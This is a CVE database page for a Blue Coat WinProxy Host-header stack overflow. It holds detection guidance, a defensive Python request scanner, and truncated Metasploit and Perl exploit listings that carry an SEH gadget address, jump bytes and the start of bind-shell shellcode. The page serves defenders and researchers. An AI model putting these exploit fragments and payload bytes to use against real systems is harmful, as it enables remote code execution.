CVE-2005-4085
Published: 2005-12-31
Priority P3 (56) · Severity high · CVSS 2.0 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 65.92% (99.2nd percentile)

Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.
Affected
5 ranges are indexed for this CVE, but none carries version bounds or a fixed version; the CVE description gives the fixed builds as WinProxy 6.1a and ProxyAV 2.4.2.3.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bluecoat | webproxy | — | — |
Detection & IOCs (extracted from sources)
Shellcode bytes: the first bytes of the win32_bind payload in the Perl exploit below. They are the PexFnstenvSub decoder stub, which many Metasploit-encoded payloads of that era share, so a match indicates an encoded payload rather than this exploit specifically:
\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26\x8c\x6d\xa3
- Detect exploit attempts by inspecting HTTP Host headers whose port field (the bytes after the colon) is oversized or non-numeric, directed at WinProxy on TCP/80; the overflow is triggered in the port field of the Host header, so a port field longer than five digits is already anomalous.
- Flag HTTP requests where the Host header port field contains a NOP sled (runs of 0x90) followed by a short JMP (0xeb) and a 4-byte SEH overwrite value; this is the layout of SEH-based exploitation of this vulnerability.
- After successful exploitation, the published payload opens a bind shell on TCP/4444 on the victim host (the Metasploit default LPORT, which an attacker can change); monitor WinProxy/ProxyAV systems for unexpected listening services, 4444 in particular.
- The exploit payload avoids the bad characters \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; byte-pattern IDS rules for shellcode in the Host header port field should account for these exclusions, since a rule that requires any of them will never fire.
- The SEH overwrite targets a POP/POP/RET gadget at 0x01031240 in PAVDLL on WinProxy 6.0 R1c; on the wire it appears little-endian as \x40\x12\x03\x01, and its presence in a Host header is a strong indicator of exploitation.
- The Metasploit module targets a different return address (0x6020ba04 in Asmdat.dll, \x04\xba\x20\x60 on the wire); gadget addresses are version-specific and will not apply to all WinProxy builds.
- The standalone Perl exploit hardcodes the SEH overwrite to PAVDLL offset 0x01031240 (POP/POP/RET), which is specific to WinProxy 6.0 R1c and may differ across patch levels, so a signature keyed on one address will miss exploits built for another.
- Payload space is limited to 600 bytes and requires a stack adjustment of -3500 bytes; custom shellcode must fit within these constraints and avoid the listed bad characters.
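The IOCs above translate directly into a request-level check. The following is an added example written for this page, not code from Blue Coat, Metasploit or the exploit author: it parses a raw HTTP request, isolates the Host header port field and tests it for the traits listed (oversized or non-numeric port, NOP sled followed by a short JMP, and the little-endian wire form of the two SEH gadget addresses quoted on the page). It also checks a candidate signature or payload against the bad-character set. The sample requests are constructed; the attack sample only mirrors the described layout (filler, NOP/NOP/JMP SHORT, SEH gadget, shellcode stand-in) and its offsets are illustrative, not the real exploit's.

```python
import re
import struct
from typing import Optional

# Bad characters the published exploit must avoid (from the IOC list above):
# the Host header port field cannot carry any of them.
BAD_CHARS = frozenset(b"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c")

# SEH overwrite addresses quoted on the page, encoded little-endian as they travel
# on the wire (the same thing the Perl exploit's reverse("\x01\x03\x12\x40") does).
KNOWN_SEH_GADGETS = {
    "PAVDLL!0x01031240 (WinProxy 6.0 R1c, Perl exploit)": struct.pack("<I", 0x01031240),
    "Asmdat.dll!0x6020ba04 (Metasploit module)": struct.pack("<I", 0x6020BA04),
}

MAX_PORT_LEN = 5  # a legitimate port is at most five ASCII digits (0-65535)

# Two or more 0x90 bytes followed by a short JMP (0xeb rel8), as in "\x90\x90\xeb\x32".
NOP_SLED_THEN_JMP = re.compile(rb"\x90{2,}\xeb.", re.DOTALL)


def host_port_field(request: bytes) -> Optional[bytes]:
    """Return the bytes after the first ':' of the Host header value, b'' if the
    header has no port, or None if there is no Host header at all."""
    head = request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n"):
        if line[:5].lower() == b"host:":
            value = line[5:].strip(b" \t")
            return value.split(b":", 1)[1] if b":" in value else b""
    return None


def scan_request(request: bytes) -> list:
    """Return the IOC hits for one raw HTTP request; an empty list means clean."""
    hits = []
    port = host_port_field(request)
    if port is None:
        return hits
    if len(port) > MAX_PORT_LEN:
        hits.append(f"oversized Host port field: {len(port)} bytes")
    elif port and not port.isdigit():
        hits.append("non-numeric Host port field")
    if NOP_SLED_THEN_JMP.search(port):
        hits.append("NOP sled followed by short JMP (0xeb) in Host port field")
    for name, wire_bytes in KNOWN_SEH_GADGETS.items():
        if wire_bytes in port:
            hits.append(f"known SEH gadget {name} in Host port field")
    return hits


def bad_chars_in(payload: bytes) -> set:
    """Bytes of `payload` that collide with the exploit's bad-character set. Useful
    when writing a signature: a pattern that needs any of these can never match."""
    return {b for b in payload if b in BAD_CHARS}


# Constructed samples (not real captures). The attack request mirrors the layout the
# page describes: filler, NOP/NOP/JMP SHORT, the little-endian SEH gadget, then a
# stand-in for shellcode. Offsets are illustrative, not the real exploit's.
BENIGN_REQUEST = b"GET / HTTP/1.0\r\nHost: 192.0.2.10:8080\r\n\r\n"
SAMPLE_PAYLOAD = (
    b"A" * 64
    + b"\x90\x90\xeb\x32"
    + KNOWN_SEH_GADGETS["PAVDLL!0x01031240 (WinProxy 6.0 R1c, Perl exploit)"]
    + b"\xcc" * 16
)
ATTACK_REQUEST = b"GET / HTTP/1.0\r\nHost: 192.0.2.10:" + SAMPLE_PAYLOAD + b"\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("attack", ATTACK_REQUEST)):
        print(label, scan_request(req) or "clean")
    print("bad chars in sample payload:", sorted(bad_chars_in(SAMPLE_PAYLOAD)) or "none")
```

Splitting the Host value on the first colon is safe here because 0x3a is itself a bad character: a real payload for this bug cannot contain a second colon, and likewise cannot contain CR or LF, so header-line parsing is not disturbed by the shellcode. The oversized-port check fires on any build of the exploit; the gadget-address check only fires on the two builds quoted on the page.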
No detection rules found.
Exploit-DB
Blue Coat WinProxy - Host Header Overflow (Metasploit)
exploitdb · 2010-07-12 · CVE-2005-4085
---
```ruby
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Blue Coat WinProxy Host Header Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the Blue Coat Systems WinProxy
				service by sending a long port value for the Host header in a HTTP
```
(listing truncated on the page)
Exploit-DB
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
exploitdb · 2006-01-07 · CVE-2005-4085
---
```perl
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: FistFucker (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;

#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
                                      # PAVDLL.01031240
                                      # (reverse() yields the little-endian
                                      #  wire form \x40\x12\x03\x01)

#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]

#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\x
```
(listing truncated on the page)
Metasploit
Blue Coat WinProxy Host Header Overflow
This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/18288
- http://secunia.com/advisories/18909
- http://securitytracker.com/id?1015441
- http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
- http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
- http://www.securityfocus.com/bid/16147
- http://www.vupen.com/english/advisories/2006/0065
- http://www.vupen.com/english/advisories/2006/0622